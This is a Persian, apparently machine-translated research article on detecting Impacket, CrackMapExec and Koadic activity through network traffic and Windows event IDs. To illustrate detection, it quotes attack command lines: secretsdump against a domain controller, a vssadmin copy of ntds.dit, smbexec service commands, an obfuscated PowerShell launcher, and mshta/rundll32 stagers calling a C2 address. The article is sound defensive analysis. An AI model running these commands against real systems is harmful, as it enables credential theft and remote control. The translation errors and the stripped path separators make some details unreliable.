🥇چگونه حملات را تشخیص دهیم Windows-زیرساخت: بررسی ابزارهای هکرها

تعداد حملات در بخش شرکتی هر سال در حال افزایش است: برای مثال در سال 2017، 13 درصد حوادث منحصر به فرد بیشتری ثبت شده است نسبت به سال 2016 و در پایان سال 2018 - 27 درصد حوادث بیشتر، نسبت به دوره قبل. از جمله مواردی که سیستم عامل ابزار اصلی کار است Windowsدر سال‌های ۲۰۱۷-۲۰۱۸، گروه APT Dragonfly، APT28، APT MuddyWater حملاتی را علیه سازمان های دولتی و نظامی در اروپا، آمریکای شمالی و عربستان سعودی انجام داد. و ما از سه ابزار برای این استفاده کردیم - ضربه زدن, CrackMapExec и کوادیک. کد منبع آنها باز و در GitHub در دسترس است.

شایان ذکر است که این ابزارها برای نفوذ اولیه استفاده نمی شوند، بلکه برای توسعه حمله در زیرساخت استفاده می شوند. مهاجمان از آنها در مراحل مختلف حمله به دنبال نفوذ محیط استفاده می کنند. به هر حال، تشخیص این مشکل و اغلب فقط با کمک فناوری است شناسایی ردپای مصالحه در ترافیک شبکه یا ابزارهایی که اجازه می دهند شناسایی اقدامات فعال یک مهاجم پس از نفوذ به زیرساخت. این ابزارها عملکردهای مختلفی از انتقال فایل ها گرفته تا تعامل با رجیستری و اجرای دستورات روی یک ماشین راه دور را ارائه می دهند. ما مطالعه ای بر روی این ابزارها برای تعیین فعالیت شبکه آنها انجام دادیم.

کاری که ما باید انجام می دادیم:

نحوه کار ابزارهای هک را درک کنید. دریابید که مهاجمان باید از چه چیزی بهره برداری کنند و از چه فناوری هایی می توانند استفاده کنند.
آنچه را که توسط ابزارهای امنیت اطلاعات در اولین مراحل حمله شناسایی نمی شود، پیدا کنید. مرحله شناسایی ممکن است نادیده گرفته شود، یا به این دلیل که مهاجم یک مهاجم داخلی است، یا به این دلیل که مهاجم از سوراخی در زیرساخت استفاده می کند که قبلاً شناخته شده نبود. بازگرداندن کل زنجیره اقدامات او ممکن می شود، از این رو میل به تشخیص حرکت بیشتر است.
موارد مثبت کاذب را از ابزارهای تشخیص نفوذ حذف کنید. ما نباید فراموش کنیم که وقتی اقدامات خاصی فقط بر اساس شناسایی شناسایی می شوند، خطاهای مکرر ممکن است. معمولاً در زیرساخت‌ها تعداد کافی راه وجود دارد که در نگاه اول از راه‌های قانونی قابل تشخیص نیستند، برای به دست آوردن هرگونه اطلاعات.

این ابزارها چه چیزی به مهاجمان می دهند؟ اگر این Impacket باشد، مهاجمان کتابخانه بزرگی از ماژول ها را دریافت می کنند که می توانند در مراحل مختلف حمله پس از شکستن محیط مورد استفاده قرار گیرند. بسیاری از ابزارها از ماژول های Impacket به صورت داخلی استفاده می کنند - به عنوان مثال، Metasploit. دارای dcomexec و wmiexec برای اجرای فرمان از راه دور، Secretsdump برای گرفتن حساب‌هایی از حافظه که از Impacket اضافه شده‌اند. در نتیجه تشخیص صحیح فعالیت چنین کتابخانه ای تشخیص مشتقات را تضمین می کند.

تصادفی نیست که سازندگان "Powered by Impacket" را درباره CrackMapExec (یا به سادگی CME) نوشتند. علاوه بر این، CME دارای عملکرد آماده ای برای سناریوهای محبوب است: Mimikatz برای به دست آوردن رمز عبور یا هش آنها، اجرای Meterpreter یا عامل Empire برای اجرای از راه دور، و Bloodhound در هیئت مدیره.

سومین ابزاری که انتخاب کردیم Koadic است. این ابزار نسبتاً جدید است و در کنفرانس بین‌المللی هکرها DEFCON 25 در سال ۲۰۱۷ ارائه شده است و رویکردی غیرمتعارف دارد: از طریق HTTP، جاوا اسکریپت و Microsoft Visual Basic Script (VBS) کار می‌کند. این رویکرد «زندگی از زمین» نامیده می‌شود: این ابزار از مجموعه‌ای از وابستگی‌ها و کتابخانه‌های داخلی استفاده می‌کند. Windowsسازندگان آن را COM Command & Control یا C3 می‌نامند.

IMPACKET

عملکرد Impacket بسیار گسترده است، از شناسایی در AD و جمع‌آوری داده‌ها از سرورهای داخلی MS SQL گرفته تا تکنیک‌هایی برای به دست آوردن اعتبارنامه‌ها، از جمله حمله رله SMB و بازیابی فایل ntds.dit حاوی هش‌های رمز عبور کاربر از یک کنترل‌کننده دامنه. Impacket همچنین دستورات را از راه دور با استفاده از چهار روش مختلف اجرا می‌کند: WMI، یک سرویس مدیریت زمان‌بندی و موارد دیگر. Windows، DCOM و SMB، و برای انجام این کار به اعتبارنامه نیاز دارد.

Secretsdump

بیایید نگاهی به Secretsdump بیندازیم. این ماژولی است که می تواند هم ماشین های کاربر و هم کنترل کننده های دامنه را هدف قرار دهد. می توان از آن برای به دست آوردن کپی از مناطق حافظه LSA، SAM، SECURITY، NTDS.dit استفاده کرد، بنابراین می توان آن را در مراحل مختلف حمله مشاهده کرد. اولین مرحله در عملکرد ماژول، احراز هویت از طریق SMB است که برای انجام خودکار حمله Pass the Hash به رمز عبور کاربر یا هش آن نیاز دارد. در مرحله بعدی درخواستی برای باز کردن دسترسی به Service Control Manager (SCM) و دسترسی به رجیستری از طریق پروتکل winreg ارائه می شود که با استفاده از آن مهاجم می تواند داده های شاخه های مورد علاقه را پیدا کند و از طریق SMB نتایج را به دست آورد.

در شکل 1 می بینیم که چگونه دقیقاً هنگام استفاده از پروتکل winreg، با استفاده از یک کلید رجیستری با LSA دسترسی به دست می آید. برای انجام این کار، از دستور DCERPC با کد 15 - OpenKey استفاده کنید.

برنج. 1. باز کردن یک کلید رجیستری با استفاده از پروتکل winreg

در مرحله بعد، هنگامی که دسترسی به کلید به دست آمد، مقادیر با دستور SaveKey با کد 20 ذخیره می شوند. Impacket این کار را به روشی بسیار خاص انجام می دهد. این مقادیر را در فایلی ذخیره می کند که نام آن رشته ای از 8 کاراکتر تصادفی است که با .tmp اضافه شده است. علاوه بر این، آپلود بیشتر این فایل از طریق SMB از فهرست System32 انجام می شود (شکل 2).

برنج. 2. طرحی برای به دست آوردن یک کلید رجیستری از یک ماشین راه دور

به نظر می رسد که چنین فعالیتی در شبکه را می توان با پرس و جو به شاخه های رجیستری خاص با استفاده از پروتکل winreg، نام های خاص، دستورات و ترتیب آنها شناسایی کرد.

این ماژول همچنین ردپاهایی را در گزارش رویدادها به جا می‌گذارد. Windows، به لطف آن به راحتی قابل تشخیص است. به عنوان مثال، در نتیجه اجرای دستور

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

در مجله Windows Server سال ۲۰۱۶ شاهد سلسله رویدادهای کلیدی زیر خواهد بود:

1. 4624 - ورود از راه دور.
2. 5145 - بررسی حقوق دسترسی به سرویس از راه دور winreg.
3. 5145 - بررسی حقوق دسترسی به فایل در فهرست System32. فایل دارای نام تصادفی ذکر شده در بالا است.
4. 4688 - ایجاد یک فرآیند cmd.exe که vssadmin را راه اندازی می کند:

“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - ایجاد یک فرآیند با دستور:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - ایجاد یک فرآیند با دستور:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - ایجاد یک فرآیند با دستور:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

مانند بسیاری از ابزارهای پس از بهره برداری، Impacket دارای ماژول هایی برای اجرای دستورات از راه دور است. ما بر روی smbexec تمرکز خواهیم کرد، که یک پوسته فرمان تعاملی را در یک ماشین راه دور فراهم می کند. این ماژول همچنین نیاز به احراز هویت از طریق SMB دارد، چه با رمز عبور یا هش رمز عبور. در شکل در شکل 3 نمونه ای از نحوه عملکرد چنین ابزاری را می بینیم، در این مورد آن کنسول مدیر محلی است.

برنج. 3. کنسول تعاملی smbexec

اولین مرحله smbexec پس از احراز هویت، باز کردن SCM با دستور OpenSCManagerW (15) است. پرس و جو قابل توجه است: قسمت MachineName DUMMY است.

برنج. 4. درخواست باز کردن Service Control Manager

در مرحله بعد، سرویس با استفاده از دستور CreateServiceW (12) ایجاد می شود. در مورد smbexec، هر بار می‌توانیم همان منطق ساخت فرمان را ببینیم. در شکل 5 سبز نشان دهنده پارامترهای فرمان غیرقابل تغییر است، زرد نشان می دهد که مهاجم می تواند چه چیزی را تغییر دهد. به راحتی می توان فهمید که نام فایل اجرایی، دایرکتوری آن و فایل خروجی قابل تغییر است، اما تغییر بقیه بدون ایجاد اختلال در منطق ماژول Impacket بسیار دشوارتر است.

برنج. 5. درخواست ایجاد یک سرویس با استفاده از Service Control Manager

Smbexec همچنین ردپاهای آشکاری در گزارش رویدادها به جا می‌گذارد. Windowsدر مجله Windows Server در سال ۲۰۱۶، برای یک پوسته فرمان تعاملی با دستور ipconfig، توالی کلیدی رویدادهای زیر را مشاهده می‌کنیم:

1. 4697 — نصب سرویس بر روی دستگاه قربانی:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - ایجاد فرآیند cmd.exe با آرگومان های نقطه 1.
3. 5145 - بررسی حقوق دسترسی به فایل __output در فهرست C$.
4. 4697 — نصب سرویس بر روی دستگاه قربانی.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - ایجاد فرآیند cmd.exe با آرگومان های نقطه 4.
6. 5145 - بررسی حقوق دسترسی به فایل __output در فهرست C$.

ایمپکت (Impacket) چارچوبی برای توسعه ابزارهای حمله است. این چارچوب تقریباً از همه پروتکل‌های موجود در ... پشتیبانی می‌کند. Windows-infrastructure و با این حال ویژگی‌های متمایز خود را دارد. این ویژگی‌ها شامل کوئری‌های خاص winreg، استفاده از SCM API با ساختار فرمان خاص خود، فرمت نام فایل و SMB share SYSTEM32 می‌شود.

CRACKMAPEXEC

ابزار CME اساساً برای خودکارسازی آن دسته از اقدامات معمولی طراحی شده است که مهاجم باید برای پیشروی در شبکه انجام دهد. این به شما امکان می دهد تا با عامل معروف Empire و Meterpreter کار کنید. برای اجرای مخفیانه دستورات، CME می تواند آنها را مبهم کند. با استفاده از Bloodhound (ابزار شناسایی جداگانه)، مهاجم می‌تواند جستجوی یک جلسه مدیر دامنه فعال را خودکار کند.

کاراگاه

Bloodhound، به عنوان یک ابزار مستقل، امکان شناسایی پیشرفته در داخل شبکه را فراهم می کند. داده‌های مربوط به کاربران، ماشین‌ها، گروه‌ها، جلسات را جمع‌آوری می‌کند و به عنوان یک اسکریپت PowerShell یا فایل باینری ارائه می‌شود. برای جمع آوری اطلاعات از پروتکل های مبتنی بر LDAP یا SMB استفاده می شود. ماژول یکپارچه سازی CME به Bloodhound اجازه می دهد تا در دستگاه قربانی بارگیری شود، داده های جمع آوری شده را پس از اجرا اجرا و دریافت کند، در نتیجه اقدامات در سیستم را خودکار می کند و آنها را کمتر قابل توجه می کند. پوسته گرافیکی Bloodhound داده‌های جمع‌آوری‌شده را در قالب نمودار ارائه می‌کند که به شما امکان می‌دهد کوتاه‌ترین مسیر را از ماشین مهاجم تا مدیر دامنه پیدا کنید.

برنج. 6. رابط Bloodhound

این ماژول برای اجرا روی دستگاه قربانی، با استفاده از ATSVC و SMB یک وظیفه (task) ایجاد می‌کند. ATSVC رابطی برای کار با زمان‌بندی وظایف است. WindowsCME از تابع NetrJobAdd (1) خود برای ایجاد وظایف در شبکه استفاده می‌کند. نمونه‌ای از آنچه ماژول CME ارسال می‌کند در شکل 7 نشان داده شده است: این یک فراخوانی دستور cmd.exe و کد مبهم‌سازی شده در قالب آرگومان‌های XML است.

شکل 7. ایجاد یک کار از طریق CME

پس از ارسال کار برای اجرا، دستگاه قربانی خود Bloodhound را راه اندازی می کند و این را می توان در ترافیک مشاهده کرد. این ماژول با پرس و جوهای LDAP برای به دست آوردن گروه های استاندارد، لیستی از همه ماشین ها و کاربران در دامنه، و کسب اطلاعات در مورد جلسات کاربر فعال از طریق درخواست SRVSVC NetSessEnum مشخص می شود.

برنج. 8. دریافت لیستی از جلسات فعال از طریق SMB

علاوه بر این، راه‌اندازی Bloodhound بر روی دستگاه قربانی با فعال بودن ممیزی با یک رویداد با شناسه 4688 (ایجاد فرآیند) و نام فرآیند همراه است. «C:WindowsSystem32cmd.exe». آنچه در مورد آن قابل توجه است، آرگومان های خط فرمان است:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

Enum_avproducts

ماژول enum_avproducts از نظر عملکرد و پیاده‌سازی بسیار جالب است. WMI به شما امکان می‌دهد داده‌ها را از اشیاء مختلف با استفاده از زبان پرس‌وجوی WQL بازیابی کنید. Windowsکه اساساً همان چیزی است که این ماژول CME از آن استفاده می‌کند. این ماژول پرس‌وجوهایی را برای کلاس‌های AntiSpywareProduct و AntiMirusProduct در مورد ابزارهای امنیتی نصب‌شده روی دستگاه قربانی ایجاد می‌کند. برای به دست آوردن داده‌های مورد نیاز، این ماژول به فضای نام rootSecurityCenter2 متصل می‌شود، سپس یک پرس‌وجوی WQL تولید کرده و پاسخی دریافت می‌کند. شکل 9 محتوای چنین پرس‌وجوها و پاسخ‌هایی را نشان می‌دهد. در مثال ما، Windows مدافع

برنج. 9. فعالیت شبکه ماژول enum_avproducts

اغلب ممیزی WMI (Trace WMI-Activity) که در رویدادهای آن می توانید اطلاعات مفیدی در مورد جستارهای WQL بیابید، ممکن است غیرفعال شود. اما اگر فعال باشد، اگر اسکریپت enum_avproducts اجرا شود، رویدادی با شناسه 11 ذخیره می‌شود که شامل نام کاربری که درخواست را ارسال کرده و نامی در فضای نام rootSecurityCenter2 خواهد بود.

هر یک از ماژول های CME مصنوعات خاص خود را داشتند، خواه پرس و جوهای خاص WQL یا ایجاد نوع خاصی از کار در یک زمانبندی کار با مبهم سازی و فعالیت های خاص Bloodhound در LDAP و SMB.

KOADIC

یکی از ویژگی‌های متمایز Koadic استفاده از قابلیت داخلی است. Windows مفسرهای جاوا اسکریپت و VBScript. از این نظر، روند زندگی مستقل از زمین را دنبال می‌کند - یعنی هیچ وابستگی خارجی ندارد و از ابزارهای استاندارد استفاده می‌کند. Windowsاین یک ابزار کامل فرماندهی و کنترل (CnC) است، زیرا پس از آلودگی، یک "ایمپلنت" روی دستگاه نصب می‌شود که امکان کنترل آن را فراهم می‌کند. چنین دستگاهی، در اصطلاح Koadic، "زامبی" نامیده می‌شود. اگر قربانی فاقد امتیازات کافی برای عملکرد کامل باشد، Koadic می‌تواند با استفاده از تکنیک‌های دور زدن UAC، آنها را ارتقا دهد.

برنج. 10. پوسته Koadic

قربانی باید با سرور Command & Control ارتباط برقرار کند. برای انجام این کار، او باید با یک URI از قبل آماده شده تماس بگیرد و بدنه اصلی Koadic را با استفاده از یکی از استیدرها دریافت کند. در شکل شکل 11 نمونه ای را برای استیدر mshta نشان می دهد.

برنج. 11. راه اندازی یک جلسه با سرور CnC

بر اساس متغیر پاسخ WS، مشخص می شود که اجرا از طریق WScript.Shell انجام می شود و متغیرهای STAGER، SESSIONKEY، JOBKEY، JOBKEYPATH، EXPIRE حاوی اطلاعات کلیدی در مورد پارامترهای جلسه جاری هستند. این اولین جفت درخواست-پاسخ در یک اتصال HTTP با یک سرور CnC است. درخواست های بعدی مستقیماً با عملکرد ماژول های نامیده شده (ایمپلنت) مرتبط است. همه ماژول های Koadic فقط با یک جلسه فعال با CnC کار می کنند.

Mimikatz

درست مانند CME که با Bloodhound کار می کند، Koadic با Mimikatz به عنوان یک برنامه جداگانه کار می کند و راه های متعددی برای راه اندازی آن دارد. در زیر یک جفت درخواست و پاسخ برای دانلود ایمپلنت Mimikatz آمده است.

برنج. 12. انتقال Mimikatz به Koadic

می توانید ببینید که چگونه فرمت URI در درخواست تغییر کرده است. اکنون حاوی مقداری برای متغیر csrf است که مسئول ماژول انتخاب شده است. به نام او توجه نکنید؛ همه ما می دانیم که CSRF معمولاً متفاوت درک می شود. پاسخ همان بدنه اصلی Koadic بود که کد مربوط به Mimikatz به آن اضافه شد. بسیار بزرگ است، بنابراین اجازه دهید به نکات کلیدی نگاه کنیم. در اینجا ما کتابخانه Mimikatz را داریم که در base64 کدگذاری شده است، یک کلاس NET سریالی که آن را تزریق می کند، و آرگومان هایی برای راه اندازی Mimikatz. نتیجه اجرا از طریق شبکه به صورت متن واضح منتقل می شود.

برنج. 13. نتیجه اجرای Mimikatz بر روی یک دستگاه از راه دور

Exec_cmd

Koadic همچنین دارای ماژول هایی است که می توانند دستورات را از راه دور اجرا کنند. در اینجا همان روش تولید URI و متغیرهای آشنای sid و csrf را خواهیم دید. در مورد ماژول exec_cmd، کدی به بدنه اضافه می شود که قادر به اجرای دستورات پوسته است. در زیر چنین کدهای موجود در پاسخ HTTP سرور CnC نشان داده شده است.

برنج. 14. کد ایمپلنت exec_cmd

متغیر GAWTUUGCFI با ویژگی WS آشنا برای اجرای کد مورد نیاز است. با کمک آن، ایمپلنت پوسته را فراخوانی می‌کند و دو شاخه کد را پردازش می‌کند - shell.exec با بازگشت جریان داده‌های خروجی و shell.run بدون بازگشت.

Koadic یک ابزار معمولی نیست، اما مصنوعات خاص خود را دارد که می توان آن را در ترافیک قانونی پیدا کرد:

تشکیل ویژه درخواست های HTTP،
با استفاده از winHttpRequests API،
ایجاد یک شی WScript.Shell از طریق ActiveXObject،
بدنه اجرایی بزرگ

اتصال اولیه توسط استیجر آغاز می‌شود، بنابراین تشخیص فعالیت آن از طریق رویدادها امکان‌پذیر می‌شود. Windowsبرای mshta، این رویداد ۴۶۸۸ است که نشان دهنده ایجاد یک فرآیند با ویژگی startup است:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

در حالی که Koadic در حال اجرا است، می‌توانید 4688 رویداد دیگر را با ویژگی‌هایی ببینید که کاملاً آن را مشخص می‌کنند:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

یافته ها

روند زندگی از طریق زمین در بین مجرمان محبوبیت پیدا می‌کند. آنها از سیستم‌های داخلی استفاده می‌کنند. Windows ابزارها و سازوکارهایی برای نیازهای خودشان. ما ابزارهای محبوبی مانند Koadic، CrackMapExec و Impacket را می‌بینیم که از این اصل پیروی می‌کنند و به طور فزاینده‌ای در گزارش‌های APT ظاهر می‌شوند. تعداد انشعاب‌های این ابزارها در GitHub نیز در حال افزایش است و ابزارهای جدیدی نیز ظاهر می‌شوند (در حال حاضر حدود هزار مورد از آنها وجود دارد). این روند به دلیل سادگی‌اش محبوبیت پیدا می‌کند: مهاجمان به ابزارهای شخص ثالث نیازی ندارند. آنها از قبل در دستگاه‌های قربانیان وجود دارند و به آنها کمک می‌کنند تا اقدامات امنیتی را دور بزنند. ما بر مطالعه تعاملات شبکه تمرکز می‌کنیم: هر ابزاری که در بالا توضیح داده شد، ردپای خود را در ترافیک شبکه به جا می‌گذارد. مطالعه دقیق آنها به ما این امکان را داد تا محصول خود را آموزش دهیم. کشف حمله شبکه PT شناسایی آنها، که در نهایت به بررسی کل زنجیره حوادث سایبری مربوط به آنها کمک می کند.

نویسنده: